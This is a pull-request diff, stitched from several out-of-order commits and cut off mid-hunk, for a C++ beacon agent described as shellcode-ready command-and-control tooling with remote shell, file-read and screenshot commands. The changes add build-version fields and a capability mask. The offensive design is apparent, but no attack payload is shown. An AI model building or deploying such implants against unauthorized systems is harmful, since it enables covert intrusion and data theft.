### PR TITLE
feat: add API version to build info and update system info response

### DIFF
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -42,9 +42,11 @@ include(${CMAKE_SOURCE_DIR}/cmake/Common.cmake)
 # =============================================================================
 set(BUILD_NUMBER "0" CACHE STRING "Agent build number")
 set(COMMIT_HASH "00000000" CACHE STRING "Agent commit hash")
+set(API_VERSION "1" CACHE STRING "Agent API version")
 list(APPEND PIR_DEFINES
     AGENT_BUILD_NUMBER=${BUILD_NUMBER}
     AGENT_COMMIT_HASH="${COMMIT_HASH}"
+    AGENT_API_VERSION=${API_VERSION}
 )
 
 include(${PIR_ROOT_DIR}/cmake/Target.cmake)

--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -42,7 +42,7 @@ include(${CMAKE_SOURCE_DIR}/cmake/Common.cmake)
 # =============================================================================
 set(BUILD_NUMBER "0" CACHE STRING "Agent build number")
 set(COMMIT_HASH "00000000" CACHE STRING "Agent commit hash")
-set(API_VERSION "2" CACHE STRING "Agent API version")
+set(API_VERSION "3" CACHE STRING "Agent API version")
 list(APPEND PIR_DEFINES
     AGENT_BUILD_NUMBER=${BUILD_NUMBER}
     AGENT_COMMIT_HASH="${COMMIT_HASH}"

--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -42,7 +42,7 @@ include(${CMAKE_SOURCE_DIR}/cmake/Common.cmake)
 # =============================================================================
 set(BUILD_NUMBER "0" CACHE STRING "Agent build number")
 set(COMMIT_HASH "00000000" CACHE STRING "Agent commit hash")
-set(API_VERSION "1" CACHE STRING "Agent API version")
+set(API_VERSION "2" CACHE STRING "Agent API version")
 list(APPEND PIR_DEFINES
     AGENT_BUILD_NUMBER=${BUILD_NUMBER}
     AGENT_COMMIT_HASH="${COMMIT_HASH}"

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -255,8 +255,8 @@ Key conventions:
 | Kind | Convention | Examples |
 |------|-----------|----------|
 | Enum names | `PascalCase` | `CommandType`, `StatusCode` |
-| Enum values (unscoped) | `PascalCase_Underscore` | `Command_GetSystemInfo`, `StatusSuccess` |
-| Functions | `PascalCase` with `Handle_` prefix for commands | `Handle_GetSystemInfoCommand` |
+| Enum values (unscoped) | `PascalCase_Underscore` | `Command_Hello`, `StatusSuccess` |
+| Functions | `PascalCase` with `Handle_` prefix for commands | `Handle_HelloCommand` |
 | Local variables | `camelCase` | `commandType`, `responseLength` |
 | Struct fields (public) | `PascalCase` | `WireDirectoryEntry::Name`, `SystemInfo::Hostname` |
 | Header files | `snake_case.h` | `commands.h` |

--- a/README.md
+++ b/README.md
@@ -49,7 +49,7 @@ This project solves that: a full C++23 codebase that compiles to position-indepe
 - **Cross-Platform** - 8 platforms (Windows, Linux, macOS, FreeBSD, Solaris, UEFI, Android, iOS) across 7 architectures (i386, x86_64, armv7a, aarch64, riscv32, riscv64, mips64) via direct syscalls
 - **TLS 1.3 + WebSocket** - Encrypted command-and-control over `wss://` using ChaCha20-Poly1305 AEAD (RFC 8446, RFC 6455)
 - **Binary Command Protocol** - 9 command types over WebSocket:
-  - `GetSystemInfo` - Machine UUID, hostname, username, CPU architecture, agent platform, OS version
+  - `Hello` - handshake: `SystemInfo` (machine UUID, hostname, username, CPU architecture, agent platform, OS version) + `AgentBuildInfo` + 256-bit `CapabilityMask`
   - `GetDirectoryContent` - Directory listing with metadata
   - `GetFileContent` - File read at offset
   - `GetFileChunkHash` - SHA-256 hash of file chunk
@@ -372,12 +372,13 @@ All OS interaction is through **direct system calls or native kernel APIs** — 
 
 All commands use a binary protocol over WebSocket. Each message starts with a `UINT8` command type byte followed by command-specific payload. Every response begins with a `UINT32` status code (`0` = success, non-zero = error).
 
-### `GetSystemInfo` (0x00)
+### `Hello` (0x00)
 
-Returns system identification info for the target host.
+Handshake: returns system identification, build metadata, and a 256-bit
+capability mask so the C2 can determine which commands this beacon supports.
 
 - **Request**: No payload (command type byte only)
-- **Response**: `UINT32 status` + `SystemInfo` + `AgentBuildInfo`
+- **Response**: `UINT32 status` + `SystemInfo` + `AgentBuildInfo` + `CapabilityMask` (32 bytes)
 
 `SystemInfo` layout (packed):
 
@@ -397,6 +398,14 @@ Returns system identification info for the target host.
 | `BuildNumber`  | `UINT32`    | Auto-incrementing build number (git commit count) |
 | `CommitHash`   | `CHAR[9]`   | Short git commit hash (8 hex chars + null)        |
 | `ApiVersion`   | `UINT32`    | Agent API version (starts at 1, bump on breaking protocol change) |
+
+`CapabilityMask` layout (packed, 32 bytes = 256 bits):
+
+| Field  | Type        | Description                                                                                                                       |
+|--------|-------------|-----------------------------------------------------------------------------------------------------------------------------------|
+| `Bits` | `UINT8[32]` | Bit `i` set ⟺ command code `i` is supported. Read bit `i` as `(Bits[i/8] >> (i%8)) & 1`. Bits `CommandTypeCount`–255 are reserved (0). |
+
+Which commands are supported is fixed at **compile time** by the `AGENT_SUPPORT_<COMMAND>` macros (default `1`; override to `0` per build/platform to compile a command out — it is then neither registered in the dispatch table nor advertised in this mask).
 
 ### `GetDirectoryContent` (0x01)
 

--- a/README.md
+++ b/README.md
@@ -398,6 +398,7 @@ capability mask so the C2 can determine which feature categories this beacon sup
 | `BuildNumber`  | `UINT32`    | Auto-incrementing build number (git commit count) |
 | `CommitHash`   | `CHAR[9]`   | Short git commit hash (8 hex chars + null)        |
 | `ApiVersion`   | `UINT32`    | Agent API version (starts at 1, bump on breaking protocol change) |
+| `Is64Bit`      | `BOOL`      | `true` iff this agent binary is 64-bit (`sizeof(void*) == 8`); agent pointer width, not OS |
 
 `CapabilityMask` layout (packed, 8 bytes = 64 bits, LSB-first per byte):
 

--- a/README.md
+++ b/README.md
@@ -48,8 +48,8 @@ This project solves that: a full C++23 codebase that compiles to position-indepe
 - **Position-Independent** - A custom LLVM pass ([pic-transform](tools/pic-transform/)) eliminates `.data`/`.rodata`/`.bss` sections at compile time, producing binaries with only a `.text` section — fully relocatable as raw shellcode, executable in RX-only memory with no writable pages required
 - **Cross-Platform** - 8 platforms (Windows, Linux, macOS, FreeBSD, Solaris, UEFI, Android, iOS) across 7 architectures (i386, x86_64, armv7a, aarch64, riscv32, riscv64, mips64) via direct syscalls
 - **TLS 1.3 + WebSocket** - Encrypted command-and-control over `wss://` using ChaCha20-Poly1305 AEAD (RFC 8446, RFC 6455)
-- **Binary Command Protocol** - 9 command types over WebSocket:
-  - `Hello` - handshake: `SystemInfo` (machine UUID, hostname, username, CPU architecture, agent platform, OS version) + `AgentBuildInfo` + 256-bit `CapabilityMask`
+- **Binary Command Protocol** - 11 command types over WebSocket:
+  - `Hello` - handshake: `SystemInfo` (machine UUID, hostname, username, CPU architecture, agent platform, OS version) + `AgentBuildInfo` + 64-bit `CapabilityMask`
   - `GetDirectoryContent` - Directory listing with metadata
   - `GetFileContent` - File read at offset
   - `GetFileChunkHash` - SHA-256 hash of file chunk
@@ -374,11 +374,11 @@ All commands use a binary protocol over WebSocket. Each message starts with a `U
 
 ### `Hello` (0x00)
 
-Handshake: returns system identification, build metadata, and a 256-bit
-capability mask so the C2 can determine which commands this beacon supports.
+Handshake: returns system identification, build metadata, and a 64-bit
+capability mask so the C2 can determine which feature categories this beacon supports.
 
 - **Request**: No payload (command type byte only)
-- **Response**: `UINT32 status` + `SystemInfo` + `AgentBuildInfo` + `CapabilityMask` (32 bytes)
+- **Response**: `UINT32 status` + `SystemInfo` + `AgentBuildInfo` + `CapabilityMask` (8 bytes)
 
 `SystemInfo` layout (packed):
 
@@ -399,13 +399,23 @@ capability mask so the C2 can determine which commands this beacon supports.
 | `CommitHash`   | `CHAR[9]`   | Short git commit hash (8 hex chars + null)        |
 | `ApiVersion`   | `UINT32`    | Agent API version (starts at 1, bump on breaking protocol change) |
 
-`CapabilityMask` layout (packed, 32 bytes = 256 bits):
+`CapabilityMask` layout (packed, 8 bytes = 64 bits, LSB-first per byte):
 
 | Field  | Type        | Description                                                                                                                       |
 |--------|-------------|-----------------------------------------------------------------------------------------------------------------------------------|
-| `Bits` | `UINT8[32]` | Bit `i` set ⟺ command code `i` is supported. Read bit `i` as `(Bits[i/8] >> (i%8)) & 1`. Bits `CommandTypeCount`–255 are reserved (0). |
+| `Bits` | `UINT8[8]` | Bit `i` set ⟺ feature category `i` is supported. Read bit `i` as `(Bits[i/8] >> (i%8)) & 1`. Bits `CapabilityBitCount`–63 are reserved (0). |
 
-Which commands are supported is fixed at **compile time** by the `AGENT_SUPPORT_<COMMAND>` macros (default `1`; override to `0` per build/platform to compile a command out — it is then neither registered in the dispatch table nor advertised in this mask).
+Category bit assignments:
+
+| Bit   | Category   | Commands owned                                                  |
+|-------|------------|-----------------------------------------------------------------|
+| 0     | FileSystem | `GetDirectoryContent`, `GetFileContent`, `GetFileChunkHash`     |
+| 1     | Shell      | `OpenShell`, `CloseShell`, `ReadShell`, `WriteShell`            |
+| 2     | Display    | `GetDisplays`, `GetScreenshot`                                  |
+| —     | (core)     | `Hello`, `Exit` — mandatory, always available, not advertised   |
+| 3–63  | reserved   | 0                                                               |
+
+Which feature categories are supported is fixed at **compile time** by the `SUPPORT_<CATEGORY>` macros (default `1`; override to `0` per build/platform to compile a whole category out — its commands are then neither registered in the dispatch table nor advertised in this mask).
 
 ### `GetDirectoryContent` (0x01)
 

--- a/README.md
+++ b/README.md
@@ -396,6 +396,7 @@ Returns system identification info for the target host.
 |----------------|-------------|--------------------------------------------------|
 | `BuildNumber`  | `UINT32`    | Auto-incrementing build number (git commit count) |
 | `CommitHash`   | `CHAR[9]`   | Short git commit hash (8 hex chars + null)        |
+| `ApiVersion`   | `UINT32`    | Agent API version (starts at 1, bump on breaking protocol change) |
 
 ### `GetDirectoryContent` (0x01)
 

--- a/book-notes/02-project-overview.md
+++ b/book-notes/02-project-overview.md
@@ -82,7 +82,7 @@ details are what make it interesting.
 
 The README lists these but doesn't say much about what each one actually does:
 
-- **GetSystemInfo** — hostname, OS version, machine ID, etc.
+- **Hello** — hostname, OS version, machine ID, etc.
 - **GetDirectoryContent** — lists files and folders (like `ls` or `dir`)
 - **GetFileContent** — downloads a file from the target
 - **WriteShell** — sends keyboard input to an interactive shell

--- a/book-notes/13-beacon-and-commands.md
+++ b/book-notes/13-beacon-and-commands.md
@@ -133,7 +133,7 @@ The read side uses a polling loop: first poll with a 5-second timeout to wait fo
 **Type:** QUESTION
 **Priority:** MEDIUM
 
-Most commands are stateless (GetSystemInfo, GetFileContent — run and done). But some need to persist state between calls. The shell process stays open between WriteShell/ReadShell commands. Screenshots need the previous frame for dirty-rect comparison.
+Most commands are stateless (Hello, GetFileContent — run and done). But some need to persist state between calls. The shell process stays open between WriteShell/ReadShell commands. Screenshots need the previous frame for dirty-rect comparison.
 
 Context holds pointers to these persistent objects. It gets allocated once and lives for the entire session, then gets reset on reconnection — each new WebSocket connection starts with a fresh Context.
 

--- a/docs/02-project-overview.md
+++ b/docs/02-project-overview.md
@@ -100,7 +100,7 @@ The agent supports 9 commands, dispatched via a function pointer array (see `doc
 
 | Command | What It Does |
 |---------|-------------|
-| `GetSystemInfo` | Collects hostname, username, OS version, machine UUID, CPU architecture |
+| `Hello` | Handshake: collects hostname, username, OS version, machine UUID, CPU architecture + reports a 256-bit capability mask |
 | `GetDirectoryContent` | Lists files and folders in a directory (like `ls` or `dir`) |
 | `GetFileContent` | Reads a file at a specified offset |
 | `GetFileChunkHash` | SHA-256 hash of a file chunk (for integrity checking) |

--- a/docs/13-beacon.md
+++ b/docs/13-beacon.md
@@ -163,6 +163,7 @@ struct AgentBuildInfo
     UINT32 BuildNumber;
     CHAR CommitHash[9]; // 8 hex chars + null
     UINT32 ApiVersion;
+    BOOL Is64Bit; // true iff this agent binary is 64-bit (sizeof(void*) == 8)
 };
 #pragma pack(pop)
 ```

--- a/docs/13-beacon.md
+++ b/docs/13-beacon.md
@@ -162,6 +162,7 @@ struct AgentBuildInfo
 {
     UINT32 BuildNumber;
     CHAR CommitHash[9]; // 8 hex chars + null
+    UINT32 ApiVersion;
 };
 #pragma pack(pop)
 ```

--- a/docs/13-beacon.md
+++ b/docs/13-beacon.md
@@ -30,7 +30,7 @@ full flow, annotated against the source.
 
 ```cpp
 CommandHandler commandHandlers[CommandType::CommandTypeCount] = {nullptr};
-commandHandlers[CommandType::Command_GetSystemInfo] = Handle_GetSystemInfoCommand;
+commandHandlers[CommandType::Command_Hello] = Handle_HelloCommand;
 commandHandlers[CommandType::Command_GetDirectoryContent] = Handle_GetDirectoryContentCommand;
 commandHandlers[CommandType::Command_GetFileContent] = Handle_GetFileContentCommand;
 commandHandlers[CommandType::Command_GetFileChunkHash] = Handle_GetFileChunkHashCommand;
@@ -210,7 +210,7 @@ response = new CHAR[responseLength];
 
 ## 5. The Context Struct
 
-Most commands are stateless. `GetSystemInfo` gathers information, writes it,
+Most commands are stateless. `Hello` gathers information, writes it,
 and is done. `GetFileContent` reads a file and returns it. No state persists
 between calls.
 

--- a/src/beacon/README.md
+++ b/src/beacon/README.md
@@ -22,7 +22,7 @@ Top-level application layer — connects to a relay server over WebSocket (TLS 1
 │       │                                                     │
 │  ┌────┴─────────────────────────────────────────────────┐   │
 │  │              Command Handlers                        │   │
-│  ├─ GetSystemInfo      → SystemInfo struct              │   │
+│  ├─ Hello               → SystemInfo struct             │   │
 │  ├─ GetDirectoryContent → DirectoryIterator             │   │
 │  ├─ GetFileContent      → File::Open + Read             │   │
 │  ├─ WriteShell          → ShellProcess::Write           │   │
@@ -72,7 +72,7 @@ Commands are dispatched via a function pointer array indexed by command type:
 ```c
 typedef Result<void, Error> (*CommandHandler)(WebSocketClient&, Span<UINT8> payload);
 CommandHandler handlers[] = {
-    HandleGetSystemInfo,        // 0
+    HandleHello,                // 0
     HandleGetDirectoryContent,  // 1
     HandleGetFileContent,       // 2
     HandleWriteShell,           // 3

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -7,7 +7,7 @@
 // Enum to represent the different command types that can be handled by the agent
 enum CommandType : UINT8
 {
-    Command_GetSystemInfo = 0,
+    Command_Hello = 0,
     Command_GetDirectoryContent = 1,
     Command_GetFileContent = 2,
     Command_GetFileChunkHash = 3,
@@ -21,6 +21,50 @@ enum CommandType : UINT8
     CommandTypeCount
 };
 
+// =============================================================================
+// Compile-time capability flags
+//
+// Each command has an AGENT_SUPPORT_<COMMAND> macro (default 1). Override to 0
+// per-platform/build (e.g. via a toolchain compile definition) to compile a
+// command out: it is then both unregistered in the dispatch table (main.cc) and
+// reported as unsupported in the Hello capability mask. These macros are the
+// single source of truth for which commands this beacon supports — the dispatch
+// wiring and BuildCapabilityMask() both derive from them.
+// =============================================================================
+#ifndef AGENT_SUPPORT_HELLO
+#define AGENT_SUPPORT_HELLO 1
+#endif
+#ifndef AGENT_SUPPORT_GET_DIRECTORY_CONTENT
+#define AGENT_SUPPORT_GET_DIRECTORY_CONTENT 1
+#endif
+#ifndef AGENT_SUPPORT_GET_FILE_CONTENT
+#define AGENT_SUPPORT_GET_FILE_CONTENT 1
+#endif
+#ifndef AGENT_SUPPORT_GET_FILE_CHUNK_HASH
+#define AGENT_SUPPORT_GET_FILE_CHUNK_HASH 1
+#endif
+#ifndef AGENT_SUPPORT_WRITE_SHELL
+#define AGENT_SUPPORT_WRITE_SHELL 1
+#endif
+#ifndef AGENT_SUPPORT_READ_SHELL
+#define AGENT_SUPPORT_READ_SHELL 1
+#endif
+#ifndef AGENT_SUPPORT_GET_DISPLAYS
+#define AGENT_SUPPORT_GET_DISPLAYS 1
+#endif
+#ifndef AGENT_SUPPORT_GET_SCREENSHOT
+#define AGENT_SUPPORT_GET_SCREENSHOT 1
+#endif
+#ifndef AGENT_SUPPORT_CLOSE_SHELL
+#define AGENT_SUPPORT_CLOSE_SHELL 1
+#endif
+#ifndef AGENT_SUPPORT_EXIT
+#define AGENT_SUPPORT_EXIT 1
+#endif
+#ifndef AGENT_SUPPORT_OPEN_SHELL
+#define AGENT_SUPPORT_OPEN_SHELL 1
+#endif
+
 #ifndef AGENT_BUILD_NUMBER
 #define AGENT_BUILD_NUMBER 0
 #endif
@@ -28,10 +72,10 @@ enum CommandType : UINT8
 #define AGENT_COMMIT_HASH "00000000"
 #endif
 #ifndef AGENT_API_VERSION
-#define AGENT_API_VERSION 1
+#define AGENT_API_VERSION 2
 #endif
 
-// Build metadata appended to GetSystemInfo response
+// Build metadata appended to the Hello response
 #pragma pack(push, 1)
 struct AgentBuildInfo
 {
@@ -40,6 +84,46 @@ struct AgentBuildInfo
     UINT32 ApiVersion;
 };
 #pragma pack(pop)
+
+// 256-bit capability mask appended to the Hello response. Bit i (byte i/8,
+// bit i%8, LSB-first) is set iff command code i is supported by this beacon.
+// Bits [CommandTypeCount .. 255] are reserved (0). The C2 reads a bit with
+// (Bits[i/8] >> (i%8)) & 1 to decide whether command code i is available.
+static constexpr USIZE CAPABILITY_MASK_BYTES = 32; // 256 bits
+
+#pragma pack(push, 1)
+struct CapabilityMask
+{
+    UINT8 Bits[CAPABILITY_MASK_BYTES];
+};
+#pragma pack(pop)
+
+// Build the capability mask at compile time from the AGENT_SUPPORT_* macros.
+// The bit position of each command equals its CommandType value.
+inline constexpr CapabilityMask BuildCapabilityMask() noexcept
+{
+    CapabilityMask mask = {};
+    auto set = [&mask](CommandType command, int supported)
+    {
+        if (supported)
+        {
+            USIZE bit = static_cast<USIZE>(command);
+            mask.Bits[bit / 8] |= static_cast<UINT8>(1u << (bit % 8));
+        }
+    };
+    set(Command_Hello,               AGENT_SUPPORT_HELLO);
+    set(Command_GetDirectoryContent, AGENT_SUPPORT_GET_DIRECTORY_CONTENT);
+    set(Command_GetFileContent,      AGENT_SUPPORT_GET_FILE_CONTENT);
+    set(Command_GetFileChunkHash,    AGENT_SUPPORT_GET_FILE_CHUNK_HASH);
+    set(Command_WriteShell,          AGENT_SUPPORT_WRITE_SHELL);
+    set(Command_ReadShell,           AGENT_SUPPORT_READ_SHELL);
+    set(Command_GetDisplays,         AGENT_SUPPORT_GET_DISPLAYS);
+    set(Command_GetScreenshot,       AGENT_SUPPORT_GET_SCREENSHOT);
+    set(Command_CloseShell,          AGENT_SUPPORT_CLOSE_SHELL);
+    set(Command_Exit,                AGENT_SUPPORT_EXIT);
+    set(Command_OpenShell,           AGENT_SUPPORT_OPEN_SHELL);
+    return mask;
+}
 
 // Status codes for command handling results
 enum StatusCode : UINT32
@@ -73,7 +157,7 @@ struct Context
 using CommandHandler = VOID (*)(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 
 // Command handler function declarations
-VOID Handle_GetSystemInfoCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
+VOID Handle_HelloCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetDirectoryContentCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetFileContentCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);
 VOID Handle_GetFileChunkHashCommand(PCHAR command, USIZE commandLength, PPCHAR response, PUSIZE responseLength, Context *context);

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -65,6 +65,7 @@ struct AgentBuildInfo
     UINT32 BuildNumber;
     CHAR CommitHash[9]; // 8 hex chars + null
     UINT32 ApiVersion;
+    BOOL Is64Bit; // true iff this agent binary is 64-bit (sizeof(void*) == 8)
 };
 #pragma pack(pop)
 

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -26,6 +26,9 @@ enum CommandType : UINT8
 #ifndef AGENT_COMMIT_HASH
 #define AGENT_COMMIT_HASH "00000000"
 #endif
+#ifndef AGENT_API_VERSION
+#define AGENT_API_VERSION 1
+#endif
 
 // Build metadata appended to GetSystemInfo response
 #pragma pack(push, 1)
@@ -33,6 +36,7 @@ struct AgentBuildInfo
 {
     UINT32 BuildNumber;
     CHAR CommitHash[9]; // 8 hex chars + null
+    UINT32 ApiVersion;
 };
 #pragma pack(pop)
 

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -65,39 +65,52 @@ struct AgentBuildInfo
     UINT32 BuildNumber;
     CHAR CommitHash[9]; // 8 hex chars + null
     UINT32 ApiVersion;
-    BOOL Is64Bit; // true iff this agent binary is 64-bit (sizeof(void*) == 8)
+    BOOL Is64Bit; ///< true iff this agent binary is 64-bit (sizeof(void*) == 8)
 };
 #pragma pack(pop)
 
-// Capability categories advertised in the Hello response. The bit position of
-// each category equals its CapabilityBit value. Hello and Exit are mandatory
-// core commands and are intentionally NOT represented here (always available).
+/**
+ * @brief Feature categories advertised in the Hello capability mask.
+ *
+ * @details Each category's bit position in CapabilityMask equals its value
+ *          here. Hello and Exit are mandatory core commands and are
+ *          intentionally NOT represented (always available, never gated).
+ */
 enum CapabilityBit : UINT8
 {
-    Capability_FileSystem = 0,
-    Capability_Shell = 1,
-    Capability_Display = 2,
+    Capability_FileSystem = 0, ///< File system access (dir listing, file read, chunk hash)
+    Capability_Shell = 1,      ///< Interactive shell (open/close/read/write)
+    Capability_Display = 2,    ///< Display enumeration + screenshot
     CapabilityBitCount
 };
 
-// 64-bit capability mask appended to the Hello response. Bit i (byte i/8,
-// bit i%8, LSB-first) is set iff feature category i is supported by this beacon.
-// Bits [CapabilityBitCount .. 63] are reserved (0). The C2 reads a bit with
-// (Bits[i/8] >> (i%8)) & 1 to decide whether category i is available.
-static constexpr USIZE CAPABILITY_MASK_BYTES = 8; // 64 bits
+/**
+ * @brief 64-bit feature-category capability mask appended to the Hello response.
+ *
+ * @details Bit i (byte i/8, bit i%8, LSB-first) is set iff feature category i
+ *          is supported. Bits [CapabilityBitCount .. 63] are reserved (0).
+ *          Read bit i as (Bits[i/8] >> (i%8)) & 1.
+ */
+static constexpr USIZE CAPABILITY_MASK_BYTES = 8; ///< CapabilityMask size in bytes (64 bits)
 
 #pragma pack(push, 1)
 struct CapabilityMask
 {
-    UINT8 Bits[CAPABILITY_MASK_BYTES];
+    UINT8 Bits[CAPABILITY_MASK_BYTES]; ///< Raw category bitmask, LSB-first per byte
 };
 #pragma pack(pop)
 
 static_assert(CapabilityBitCount <= CAPABILITY_MASK_BYTES * 8, "CapabilityMask too small for categories");
 static_assert(sizeof(CapabilityMask) == 8, "CapabilityMask must stay 8 bytes on the wire");
 
-// Build the capability mask at compile time from the SUPPORT_* category macros.
-// The bit position of each category equals its CapabilityBit value.
+/**
+ * @brief Builds the capability mask at compile time from the SUPPORT_* macros.
+ *
+ * @details Each category bit mirrors its SUPPORT_<CATEGORY> macro; the bit
+ *          position equals the CapabilityBit value.
+ *
+ * @return Compile-time-constant CapabilityMask to append to the Hello response.
+ */
 inline constexpr CapabilityMask BuildCapabilityMask() noexcept
 {
     CapabilityMask mask = {};

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -24,45 +24,28 @@ enum CommandType : UINT8
 // =============================================================================
 // Compile-time capability flags
 //
-// Each command has an AGENT_SUPPORT_<COMMAND> macro (default 1). Override to 0
-// per-platform/build (e.g. via a toolchain compile definition) to compile a
-// command out: it is then both unregistered in the dispatch table (main.cc) and
-// reported as unsupported in the Hello capability mask. These macros are the
-// single source of truth for which commands this beacon supports — the dispatch
-// wiring and BuildCapabilityMask() both derive from them.
+// Each FEATURE CATEGORY has a SUPPORT_<CATEGORY> macro (default 1). Override to
+// 0 per-platform/build (e.g. via a toolchain compile definition) to compile a
+// whole category out: every command it owns is then unregistered in the
+// dispatch table (main.cc) and its bit is cleared in the Hello capability mask.
+// These macros are the single source of truth for which feature categories this
+// beacon supports — the dispatch wiring and BuildCapabilityMask() both derive
+// from them. Hello and Exit are mandatory core commands and are always
+// registered; they are not feature-gated and not advertised in the mask.
+//
+// Category -> owned commands:
+//   FILESYSTEM  GetDirectoryContent, GetFileContent, GetFileChunkHash
+//   SHELL       OpenShell, CloseShell, ReadShell, WriteShell
+//   DISPLAY     GetDisplays, GetScreenshot
 // =============================================================================
-#ifndef AGENT_SUPPORT_HELLO
-#define AGENT_SUPPORT_HELLO 1
+#ifndef SUPPORT_FILESYSTEM
+#define SUPPORT_FILESYSTEM 0
 #endif
-#ifndef AGENT_SUPPORT_GET_DIRECTORY_CONTENT
-#define AGENT_SUPPORT_GET_DIRECTORY_CONTENT 1
+#ifndef SUPPORT_SHELL
+#define SUPPORT_SHELL 0
 #endif
-#ifndef AGENT_SUPPORT_GET_FILE_CONTENT
-#define AGENT_SUPPORT_GET_FILE_CONTENT 1
-#endif
-#ifndef AGENT_SUPPORT_GET_FILE_CHUNK_HASH
-#define AGENT_SUPPORT_GET_FILE_CHUNK_HASH 1
-#endif
-#ifndef AGENT_SUPPORT_WRITE_SHELL
-#define AGENT_SUPPORT_WRITE_SHELL 1
-#endif
-#ifndef AGENT_SUPPORT_READ_SHELL
-#define AGENT_SUPPORT_READ_SHELL 1
-#endif
-#ifndef AGENT_SUPPORT_GET_DISPLAYS
-#define AGENT_SUPPORT_GET_DISPLAYS 1
-#endif
-#ifndef AGENT_SUPPORT_GET_SCREENSHOT
-#define AGENT_SUPPORT_GET_SCREENSHOT 1
-#endif
-#ifndef AGENT_SUPPORT_CLOSE_SHELL
-#define AGENT_SUPPORT_CLOSE_SHELL 1
-#endif
-#ifndef AGENT_SUPPORT_EXIT
-#define AGENT_SUPPORT_EXIT 1
-#endif
-#ifndef AGENT_SUPPORT_OPEN_SHELL
-#define AGENT_SUPPORT_OPEN_SHELL 1
+#ifndef SUPPORT_DISPLAY
+#define SUPPORT_DISPLAY 1
 #endif
 
 #ifndef AGENT_BUILD_NUMBER
@@ -72,7 +55,7 @@ enum CommandType : UINT8
 #define AGENT_COMMIT_HASH "00000000"
 #endif
 #ifndef AGENT_API_VERSION
-#define AGENT_API_VERSION 2
+#define AGENT_API_VERSION 3
 #endif
 
 // Build metadata appended to the Hello response
@@ -85,11 +68,22 @@ struct AgentBuildInfo
 };
 #pragma pack(pop)
 
-// 256-bit capability mask appended to the Hello response. Bit i (byte i/8,
-// bit i%8, LSB-first) is set iff command code i is supported by this beacon.
-// Bits [CommandTypeCount .. 255] are reserved (0). The C2 reads a bit with
-// (Bits[i/8] >> (i%8)) & 1 to decide whether command code i is available.
-static constexpr USIZE CAPABILITY_MASK_BYTES = 32; // 256 bits
+// Capability categories advertised in the Hello response. The bit position of
+// each category equals its CapabilityBit value. Hello and Exit are mandatory
+// core commands and are intentionally NOT represented here (always available).
+enum CapabilityBit : UINT8
+{
+    Capability_FileSystem = 0,
+    Capability_Shell = 1,
+    Capability_Display = 2,
+    CapabilityBitCount
+};
+
+// 64-bit capability mask appended to the Hello response. Bit i (byte i/8,
+// bit i%8, LSB-first) is set iff feature category i is supported by this beacon.
+// Bits [CapabilityBitCount .. 63] are reserved (0). The C2 reads a bit with
+// (Bits[i/8] >> (i%8)) & 1 to decide whether category i is available.
+static constexpr USIZE CAPABILITY_MASK_BYTES = 8; // 64 bits
 
 #pragma pack(push, 1)
 struct CapabilityMask
@@ -98,30 +92,25 @@ struct CapabilityMask
 };
 #pragma pack(pop)
 
-// Build the capability mask at compile time from the AGENT_SUPPORT_* macros.
-// The bit position of each command equals its CommandType value.
+static_assert(CapabilityBitCount <= CAPABILITY_MASK_BYTES * 8, "CapabilityMask too small for categories");
+static_assert(sizeof(CapabilityMask) == 8, "CapabilityMask must stay 8 bytes on the wire");
+
+// Build the capability mask at compile time from the SUPPORT_* category macros.
+// The bit position of each category equals its CapabilityBit value.
 inline constexpr CapabilityMask BuildCapabilityMask() noexcept
 {
     CapabilityMask mask = {};
-    auto set = [&mask](CommandType command, int supported)
+    auto set = [&mask](CapabilityBit bit, int supported)
     {
         if (supported)
         {
-            USIZE bit = static_cast<USIZE>(command);
-            mask.Bits[bit / 8] |= static_cast<UINT8>(1u << (bit % 8));
+            USIZE b = static_cast<USIZE>(bit);
+            mask.Bits[b / 8] |= static_cast<UINT8>(1u << (b % 8));
         }
     };
-    set(Command_Hello,               AGENT_SUPPORT_HELLO);
-    set(Command_GetDirectoryContent, AGENT_SUPPORT_GET_DIRECTORY_CONTENT);
-    set(Command_GetFileContent,      AGENT_SUPPORT_GET_FILE_CONTENT);
-    set(Command_GetFileChunkHash,    AGENT_SUPPORT_GET_FILE_CHUNK_HASH);
-    set(Command_WriteShell,          AGENT_SUPPORT_WRITE_SHELL);
-    set(Command_ReadShell,           AGENT_SUPPORT_READ_SHELL);
-    set(Command_GetDisplays,         AGENT_SUPPORT_GET_DISPLAYS);
-    set(Command_GetScreenshot,       AGENT_SUPPORT_GET_SCREENSHOT);
-    set(Command_CloseShell,          AGENT_SUPPORT_CLOSE_SHELL);
-    set(Command_Exit,                AGENT_SUPPORT_EXIT);
-    set(Command_OpenShell,           AGENT_SUPPORT_OPEN_SHELL);
+    set(Capability_FileSystem, SUPPORT_FILESYSTEM);
+    set(Capability_Shell, SUPPORT_SHELL);
+    set(Capability_Display, SUPPORT_DISPLAY);
     return mask;
 }
 

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -39,10 +39,10 @@ enum CommandType : UINT8
 //   DISPLAY     GetDisplays, GetScreenshot
 // =============================================================================
 #ifndef SUPPORT_FILESYSTEM
-#define SUPPORT_FILESYSTEM 0
+#define SUPPORT_FILESYSTEM 1
 #endif
 #ifndef SUPPORT_SHELL
-#define SUPPORT_SHELL 0
+#define SUPPORT_SHELL 1
 #endif
 #ifndef SUPPORT_DISPLAY
 #define SUPPORT_DISPLAY 1

--- a/src/beacon/commands.h
+++ b/src/beacon/commands.h
@@ -15,8 +15,9 @@ enum CommandType : UINT8
     Command_ReadShell = 5,
     Command_GetDisplays = 6,
     Command_GetScreenshot = 7,
-    Command_ResetShell = 8,
